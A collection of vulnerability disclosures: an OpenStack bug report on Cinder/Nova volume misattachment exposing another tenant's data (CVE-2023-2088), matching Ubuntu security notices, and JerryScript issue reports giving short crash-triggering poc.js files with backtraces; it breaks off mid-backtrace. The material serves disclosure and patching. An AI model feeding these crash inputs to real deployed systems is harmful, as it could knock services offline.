A flaw was found in OpenStack due to an inconsistency between Cinder and Nova. This issue can be triggered intentionally or by accident. A remote, authenticated attacker could exploit this vulnerability by detaching one of their volumes from Cinder. The highest impact is to confidentiality.

Hello OpenStack Security Team,

I’m writing to you, as we faced a serious security breach in OpenStack functionality(correlated a bit with libvirt, iscsi and huawei driver). I was going through OSSA documents and correlated libvirt notes, but I couldn't find something similar. It is not related to https://security.openstack.org/ossa/OSSA-2020-006.html

In short: we observed that newly created cinder volume(1GB size) was attached to compute node instance, but an instance recognized it as a 115GB volume, which(this 115GB volume) in fact was connected to another instance on the same compute node.

\[1. Test environment\]  
Compute node: OpenStack Ussuri configured with Huawei dorado as a storage backend(configuration driver is available here: https://docs.openstack.org/cinder/rocky/configuration/block-storage/drivers/huawei-storage-driver.html)  
Packages:  
v# dpkg -l | grep libvirt  
ii libvirt-clients 6.0.0-0ubuntu8.16 amd64 Programs for the libvirt library  
ii libvirt-daemon 6.0.0-0ubuntu8.16 amd64 Virtualization daemon  
ii libvirt-daemon-driver-qemu 6.0.0-0ubuntu8.16 amd64 Virtualization daemon QEMU connection driver  
ii libvirt-daemon-driver-storage-rbd 6.0.0-0ubuntu8.16 amd64 Virtualization daemon RBD storage driver  
ii libvirt-daemon-system 6.0.0-0ubuntu8.16 amd64 Libvirt daemon configuration files  
ii libvirt-daemon-system-systemd 6.0.0-0ubuntu8.16 amd64 Libvirt daemon configuration files (systemd)  
ii libvirt0:amd64 6.0.0-0ubuntu8.16 amd64 library for interfacing with different virtualization systems  
ii nova-compute-libvirt 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node libvirt support  
ii python3-libvirt 6.1.0-1 amd64 libvirt Python 3 bindings

\# dpkg -l | grep qemu  
ii ipxe-qemu 1.0.0+git-20190109.133f4c4-0ubuntu3.2 all PXE boot firmware - ROM images for qemu  
ii ipxe-qemu-256k-compat-efi-roms 1.0.0+git-20150424.a25a16d-0ubuntu4 all PXE boot firmware - Compat EFI ROM images for qemu  
ii libvirt-daemon-driver-qemu 6.0.0-0ubuntu8.16 amd64 Virtualization daemon QEMU connection driver  
ii qemu 1:4.2-3ubuntu6.23 amd64 fast processor emulator, dummy package  
ii qemu-block-extra:amd64 1:4.2-3ubuntu6.23 amd64 extra block backend modules for qemu-system and qemu-utils  
ii qemu-kvm 1:4.2-3ubuntu6.23 amd64 QEMU Full virtualization on x86 hardware  
ii qemu-system-common 1:4.2-3ubuntu6.23 amd64 QEMU full system emulation binaries (common files)  
ii qemu-system-data 1:4.2-3ubuntu6.23 all QEMU full system emulation (data files)  
ii qemu-system-gui:amd64 1:4.2-3ubuntu6.23 amd64 QEMU full system emulation binaries (user interface and audio support)  
ii qemu-system-x86 1:4.2-3ubuntu6.23 amd64 QEMU full system emulation binaries (x86)  
ii qemu-utils 1:4.2-3ubuntu6.23 amd64 QEMU utilities

\# dpkg -l | grep nova  
ii nova-common 2:21.2.4-0ubuntu1 all OpenStack Compute - common files  
ii nova-compute 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node base  
ii nova-compute-kvm 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node (KVM)  
ii nova-compute-libvirt 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node libvirt support  
ii python3-nova 2:21.2.4-0ubuntu1 all OpenStack Compute Python 3 libraries  
ii python3-novaclient 2:17.0.0-0ubuntu1 all client library for OpenStack Compute API - 3.x

\# dpkg -l | grep multipath  
ii multipath-tools 0.8.3-1ubuntu2 amd64 maintain multipath block device access

\# dpkg -l | grep iscsi  
ii libiscsi7:amd64 1.18.0-2 amd64 iSCSI client shared library  
ii open-iscsi 2.0.874-7.1ubuntu6.2 amd64 iSCSI initiator tools

\# cat /etc/lsb-release  
DISTRIB\_ID=Ubuntu  
DISTRIB\_RELEASE=20.04  
DISTRIB\_CODENAME=focal  
DISTRIB\_DESCRIPTION="Ubuntu 20.04.4 LTS"

Instance OS: Debian-11-amd64

\[2. Test scenario\]  
Already created instance with two volumes attached. First - 10GB for root system, second - 115GB used as vdb. Recognized by compute node as vda - dm-11, vdb - dm-9:

\# virsh domblklist 90fas439-fc0e-4e22-8d0b-6f2a18eee5c1  
 Target Source  
\-------\-------\-------\-  
 vda /dev/dm-11  
 vdb /dev/dm-9

\# multipath -ll  
(...)  
36e00084100ee7e7ed6ad25d900002f6b dm-9 HUAWEI,XSG1  
size=115G features='0' hwhandler='0' wp=rw  
\`-+- policy='service-time 0' prio=1 status=active  
  |- 14:0:0:4 sdm 8:192 active ready running  
  |- 15:0:0:4 sdo 8:224 active ready running  
  |- 16:0:0:4 sdl 8:176 active ready running  
  \`- 17:0:0:4 sdn 8:208 active ready running  
(...)  
36e00084100ee7e7ed6acaa2900002f6a dm-11 HUAWEI,XSG1  
size=10G features='0' hwhandler='0' wp=rw  
\`-+- policy='service-time 0' prio=1 status=active  
  |- 14:0:0:3 sdq 65:0 active ready running  
  |- 15:0:0:3 sdr 65:16 active ready running  
  |- 16:0:0:3 sdp 8:240 active ready running  
  \`- 17:0:0:3 sds 65:32 active ready running

Creating a new instance, with the same OS guest system and 10GB root volume. After successful deployment, creating a new volume(1GB) size and attaching it to newly created instance. We can see after that:

\# multipath -ll  
(...)  
36e00084100ee7e7ed6ad25d900002f6b dm-9 HUAWEI,XSG1  
size=115G features='0' hwhandler='0' wp=rw  
\`-+- policy='service-time 0' prio=1 status=active  
  |- 14:0:0:10 sdao 66:128 failed faulty running  
  |- 14:0:0:4 sdm 8:192 active ready running  
  |- 15:0:0:10 sdap 66:144 failed faulty running  
  |- 15:0:0:4 sdo 8:224 active ready running  
  |- 16:0:0:10 sdan 66:112 failed faulty running  
  |- 16:0:0:4 sdl 8:176 active ready running  
  |- 17:0:0:10 sdaq 66:160 failed faulty running  
  \`- 17:0:0:4 sdn 8:208 active ready running

This way at instance we were able to see a new drive - not 1GB, but 115GB -> so it seems it was incorrectly attached and this way we were able to destroy some data on that volume.

Additionaly we were able to see many errors like that in compute node logs:

\# dmesg -T | grep dm-9  
\[Fri Jan 27 13:37:42 2023\] blk\_update\_request: critical target error, dev dm-9, sector 62918760 op 0x1:(WRITE) flags 0x8800 phys\_seg 2 prio class 0  
\[Fri Jan 27 13:37:42 2023\] blk\_update\_request: critical target error, dev dm-9, sector 33625152 op 0x1:(WRITE) flags 0x8800 phys\_seg 6 prio class 0  
\[Fri Jan 27 13:37:46 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66663000 op 0x1:(WRITE) flags 0x8800 phys\_seg 5 prio class 0  
\[Fri Jan 27 13:37:46 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66598120 op 0x1:(WRITE) flags 0x8800 phys\_seg 5 prio class 0  
\[Fri Jan 27 13:37:51 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66638680 op 0x1:(WRITE) flags 0x8800 phys\_seg 12 prio class 0  
\[Fri Jan 27 13:37:56 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66614344 op 0x1:(WRITE) flags 0x8800 phys\_seg 1 prio class 0  
\[Fri Jan 27 13:37:56 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66469296 op 0x1:(WRITE) flags 0x8800 phys\_seg 24 prio class 0  
\[Fri Jan 27 13:37:56 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66586472 op 0x1:(WRITE) flags 0x8800 phys\_seg 3 prio class 0  
(...)

Unfortunately we do not know what is a perfect test-scenario for it as we could face such issue in less than 2% of our tries, but it looks like a serious security breach.

Additionally we observed that linux kernel is not fully clearing a device allocation(from volume detach), so some of drives names are visible in an output, i.e. lsblk command. Then, after new volume attachment we can see such names(i.e. sdao, sdap, sdan and so on) are reusable by that drive and wrongly mapped by multipath/iscsi to another drive and this way we hit an issue.  
Our question is why linux kernel of compute node is not removing devices allocation and this way is leading to a scenario like that? Maybe this can be a solution here.

Thanks in advance for your help and understanding. In case when more details is needed, do not hesitate to contact me.

CVE-2023-2088: Bug #2004555 “[OSSA-2023-003] Unauthorized volume access through...” : Bugs : OpenStack Compute (nova)

Ubuntu Security Notice 6073-3 - Jan Wasilewski and Gorka Eguileor discovered that Nova incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-3  
May 11, 2023

nova vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Nova could be made to expose sensitive information.

Software Description:  
- nova: OpenStack Compute cloud infrastructure

Details:

Jan Wasilewski and Gorka Eguileor discovered that Nova incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-nova                    3:27.0.0-0ubuntu1.1

Ubuntu 22.10:  
   python3-nova                    3:26.1.0-0ubuntu2.1

Ubuntu 22.04 LTS:  
   python3-nova                    3:25.1.0-0ubuntu2.1

Ubuntu 20.04 LTS:  
   python3-nova                    2:21.2.4-0ubuntu2.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-3  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/nova/3:27.0.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/nova/3:26.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nova/3:25.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.3

Ubuntu Security Notice USN-6073-3

Ubuntu Security Notice 6073-1 - Jan Wasilewski and Gorka Eguileor discovered that Cinder incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-1  
May 11, 2023

cinder vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Cinder could be made to expose sensitive information.

Software Description:  
- cinder: OpenStack storage service

Details:

Jan Wasilewski and Gorka Eguileor discovered that Cinder incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-cinder                  2:22.0.0-0ubuntu1.1

Ubuntu 22.10:  
   python3-cinder                  2:21.1.0-0ubuntu2.1

Ubuntu 22.04 LTS:  
   python3-cinder                  2:20.1.0-0ubuntu2.1

Ubuntu 20.04 LTS:  
   python3-cinder                  2:16.4.2-0ubuntu2.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/cinder/2:22.0.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/cinder/2:21.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/cinder/2:20.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/cinder/2:16.4.2-0ubuntu2.3

Ubuntu Security Notice USN-6073-1

Ubuntu Security Notice 6073-4 - Jan Wasilewski and Gorka Eguileor discovered that os-brick incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-4  
May 11, 2023

python-os-brick vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

os-brick could be made to expose sensitive information.

Software Description:  
- python-os-brick: Library for managing local volume attaches

Details:

Jan Wasilewski and Gorka Eguileor discovered that os-brick incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-os-brick                6.2.0-0ubuntu2.1

Ubuntu 22.10:  
   python3-os-brick                6.1.0-0ubuntu1.1

Ubuntu 22.04 LTS:  
   python3-os-brick                5.2.2-0ubuntu1

Ubuntu 20.04 LTS:  
   python3-os-brick                3.0.8-0ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-4  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/python-os-brick/6.2.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/python-os-brick/6.1.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-os-brick/5.2.2-0ubuntu1  
   https://launchpad.net/ubuntu/+source/python-os-brick/3.0.8-0ubuntu1.1

Ubuntu Security Notice USN-6073-4

Ubuntu Security Notice 6073-2 - Jan Wasilewski and Gorka Eguileor discovered that Glance_store incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-2  
May 11, 2023

python-glance-store vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Glance_store could be made to expose sensitive information.

Software Description:  
- python-glance-store: OpenStack Image Service store library

Details:

Jan Wasilewski and Gorka Eguileor discovered that Glance_store incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-glance-store            4.3.0-0ubuntu1.1

Ubuntu 22.10:  
   python3-glance-store            4.1.0-0ubuntu1.1

Ubuntu 22.04 LTS:  
   python3-glance-store            3.0.0-0ubuntu1.1

Ubuntu 20.04 LTS:  
   python3-glance-store            2.0.0-0ubuntu4.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-2  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/python-glance-store/4.3.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/4.1.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/3.0.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/2.0.0-0ubuntu4.1

Ubuntu Security Notice USN-6073-2

Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the parser_parse_function_arguments at jerry-core/parser/js/js-parser.c.

**JerryScript revision**

Commit: 1a2c047  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
class C { async#\* method ( 

**Execution steps & Output**

    $ ./jerryscript/build/bin/jerry poc.js
    ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1587.
    Error: JERRY_FATAL_FAILED_ASSERTION
    Aborted
    

**Backtrace**

    #0  0xf7fcfd99 in __kernel_vsyscall ()
    #1  0xf7ca4276 in raise () from /lib32/libc.so.6
    #2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
    #5  0x08260d64 in jerry_assert_fail (assertion=0x84433e0 <str> "context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION",
        file=0x8442ec0 <str> "jerryscript/jerry-core/parser/js/js-parser.c",
        function=0x8443440 <__func__.parser_parse_function_arguments> "parser_parse_function_arguments", line=1587)
        at jerryscript/jerry-core/jrt/jrt-fatals.c:83
    #6  0x0827592c in parser_parse_function_arguments (context_p=0xffffcd30, end_type=<optimized out>)
        at jerryscript/jerry-core/parser/js/js-parser.c:1587
    #7  0x0827240a in parser_parse_function (context_p=<optimized out>, status_flags=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser.c:2685
    #8  0x08399b84 in lexer_construct_function_object (context_p=0xffffcd30, extra_status_flags=34717702)
        at jerryscript/jerry-core/parser/js/js-lexer.c:2695
    #9  0x083a30d3 in parser_parse_class_body (context_p=<optimized out>, opts=<optimized out>, class_name_index=0)
        at jerryscript/jerry-core/parser/js/js-parser-expr.c:908
    #10 parser_parse_class (context_p=<optimized out>, is_statement=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1110
    #11 0x083c9959 in parser_parse_statements (context_p=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-statm.c:2787
    #12 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
        at jerryscript/jerry-core/parser/js/js-parser.c:2280
    #13 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100) at jerryscript/jerry-core/parser/js/js-parser.c:3326
    #14 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0) at jerryscript/jerry-core/api/jerryscript.c:412
    #15 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
        at jerryscript/jerry-core/api/jerryscript.c:480
    #16 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>) at jerryscript/jerry-ext/util/sources.c:52
    #17 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5e0 "poc.js") at jerryscript/jerry-ext/util/sources.c:63
    #18 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at jerryscript/jerry-main/main-desktop.c:156
    

Credits:  
@Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-31918: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments) · Issue #5064 · jerryscript-project/je

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the jcontext_raise_exception at jerry-core/jcontext/jcontext.c.

**JerryScript revision**

Commit: 05dbbd1  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
var t \= Function ( ) ; 
t \[ Symbol . species \] \= Object ; 
var e \= new Proxy ( { constructor : t  } , { set : function ( ) { } }  ) ; 
RegExp . prototype \[ Symbol . matchAll \] . call ( e ) ; 

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion '!jcontext\_has\_pending\_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext\_raise\_exception):88.
Error: JERRY\_FATAL\_FAILED\_ASSERTION
Aborted (core dumped)

**Backtrace**

    (gdb) #0  0xf7f40d99 in __kernel_vsyscall ()                                                                            
    #1  0xf7c15276 in raise () from /lib32/libc.so.6                                                                        
    #2  0xf7bfd3f7 in abort () from /lib32/libc.so.6                                                                        
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                  
        at /jerryscript/jerry-port/common/jerry-port-process.c:29                              
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                       
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:63                                         
    #5  0x08260d64 in jerry_assert_fail (                                                                                   
        assertion=0x8434bc0 <str> "!jcontext_has_pending_exception ()",                                                     
        file=0x8434b00 <str> "/jerryscript/jerry-core/jcontext/jcontext.c",                    
        function=0x8434c20 <__func__.jcontext_raise_exception> "jcontext_raise_exception", line=88)                         
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:83                                         
    #6  0x0825e7b0 in jcontext_raise_exception (error=4115661203)                                                           
        at /jerryscript/jerry-core/jcontext/jcontext.c:88    
    #7  0x081f52e5 in ecma_raise_standard_error (error_type=JERRY_ERROR_SYNTAX, [0/1762]
        msg=ECMA_ERR_INVALID_REGEXP_FLAGS)    at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:315#8  0x081f5a91 in ecma_raise_syntax_error (msg=ECMA_ERR_INVALID_REGEXP_FLAGS)
        at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:456
    #9  0x08234ac7 in ecma_regexp_parse_flags (flags_str_p=<optimized out>, 
        flags_p=<optimized out>)
        at /jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:115
    #10 0x0835e0d2 in ecma_builtin_regexp_prototype_match_all (
        regexp_obj_p=0xffcd35c0, string_arg=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:504
    #11 ecma_builtin_regexp_prototype_dispatch_routine (
        builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
        arguments_list_p=<optimized out>, arguments_number=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:598
    #12 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=0xffcd3690, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #13 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #14 0x081fb6b8 in ecma_op_function_call_native_built_in (
        func_obj_p=0xf55004c0, this_arg_value=4115662259, 
        arguments_list_p=0xffcd38d4, arguments_list_len=0)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #15 0x081fa81d in ecma_op_function_call (func_obj_p=0xf55004c0, 
        this_arg_value=4115662259, arguments_list_p=0xffcd38d4,  
        arguments_list_len=0)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #16 0x0833172e in ecma_builtin_function_prototype_object_call (
        func_obj_p=0xf55004c0, arguments_list_p=0xffcd38d0, 
        arguments_number=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:288
    #17 ecma_builtin_function_prototype_dispatch_routine (
        builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
        arguments_list_p=<optimized out>, arguments_number=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:529
    #18 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=0xffcd38d0, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #19 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
        this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
        arguments_list_len=<optimized out>)
        at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #20 0x081fb6b8 in ecma_op_function_call_native_built_in (
        func_obj_p=0xf5500460, this_arg_value=4115662019, 
        arguments_list_p=0xffcd3af4, arguments_list_len=1)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #21 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500460, 
        this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
        arguments_list_len=1)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #22 0x081fa5cf in ecma_op_function_validated_call (callee=4115661923, 
        this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
        arguments_list_len=1)
        at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
    #23 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>)
        at /jerryscript/jerry-core/vm/vm.c:758
    #24 vm_execute (frame_ctx_p=0xffcd3ac0)
        at /jerryscript/jerry-core/vm/vm.c:5217
    #25 0x082d4f62 in vm_run (shared_p=0xffcd3bb0, this_binding_value=4119870595, 
        lex_env_p=0xf57007b0)
        at /jerryscript/jerry-core/vm/vm.c:5312
    #26 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,  
        function_object_p=<optimized out>)
        at /jerryscript/jerry-core/vm/vm.c:286
    #27 0x0812a4e5 in jerry_run (script=4115663075)
        at /jerryscript/jerry-core/api/jerryscript.c:548
    #28 0x083eac3f in jerryx_source_exec_script (path_p=0xffcd5235 "test.js")
        at /jerryscript/jerry-ext/util/sources.c:68
    #29 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
        at /jerryscript/jerry-main/main-desktop.c:156
    (gdb) quit                                
    

credits: @EJueon, @Ye0nny of the seclab-yonsei.

CVE-2023-31919: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. · Issue #5069 · jerryscript-project/jerryscript

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c.

**JerryScript revision**

Commit: 05dbbd1  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**

// poc.js
var x \= BigInt ( 8 \*\* 16 + 1 ) ;  
x \*\* BigInt ( 4 ) / x; 

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'dividend\_end\_p\[0\] == divisor\_high && dividend\_end\_p\[-1\] < divisor\_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma\_big\_uint\_div\_mod):1119.
Error: JERRY\_FATAL\_FAILED\_ASSERTION
Aborted

**Backtrace**

    (gdb) #0  0xf7efdd99 in __kernel_vsyscall ()                                                                                                                                                                                                                                                                         
    #1  0xf7bd2276 in raise () from /lib32/libc.so.6                                                                                                                                                                                                                                                                     
    #2  0xf7bba3f7 in abort () from /lib32/libc.so.6                                                                                                                                                                                                                                                                     
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                                                                                                                                                                                                               
        at /jerryscript/jerry-port/common/jerry-port-process.c:29                                                                                                                                                                                                                           
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                                                                                                                                                                                                                    
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:63                                                                                                                                                                                                                                      
    #5  0x08260d64 in jerry_assert_fail (                                                                                                                                                                                                                                                                                
        assertion=0x846e200 <str> "dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high",                                                                                                                                                                                                              
        file=0x846d800 <str> "/jerryscript/jerry-core/ecma/operations/ecma-big-uint.c",                                                                                                                                                                                                     
        function=0x846e080 <__func__.ecma_big_uint_div_mod> "ecma_big_uint_div_mod", line=1119)                                                                                                                                                                                                                          
        at /jerryscript/jerry-core/jrt/jrt-fatals.c:83                                                                                                                                                                                                                                      
    #6  0x08380b54 in ecma_big_uint_div_mod (dividend_value_p=0xf4203c40,                                                                                                                                                                                                                                                
        divisor_value_p=0xf5600630, is_mod=<optimized out>) 
        at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c:1119                                                                                                                                                                                                                     
    #7  0x081dfc96 in ecma_bigint_div_mod (left_value=4095753286, 
        right_value=4116710966, is_mod=<optimized out>)
        at /jerryscript/jerry-core/ecma/operations/ecma-bigint.c:1337                                                                                                                                                                                                                       
    #8  0x082be8b9 in do_number_arithmetic (op=<optimized out>, 
        left_value=<optimized out>, right_value=<optimized out>)
        at /jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:148                                                                                                                                                                                                                        
    #9  0x082dd6f0 in vm_loop (frame_ctx_p=0xffdc12c0)
        at /jerryscript/jerry-core/vm/vm.c:3563
    #10 0x082d6b83 in vm_execute (frame_ctx_p=0xffdc12c0)
        at /jerryscript/jerry-core/vm/vm.c:5211
    #11 0x082d4f62 in vm_run (shared_p=0xffdc13d0, this_binding_value=4118822019,                                                                                                                                                                                                                                        
        lex_env_p=0xf56007b0)                                                    
        at /jerryscript/jerry-core/vm/vm.c:5312
    #12 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>, 
        function_object_p=<optimized out>)
        at /jerryscript/jerry-core/vm/vm.c:286
    #13 0x0812a4e5 in jerry_run (script=4114614595)
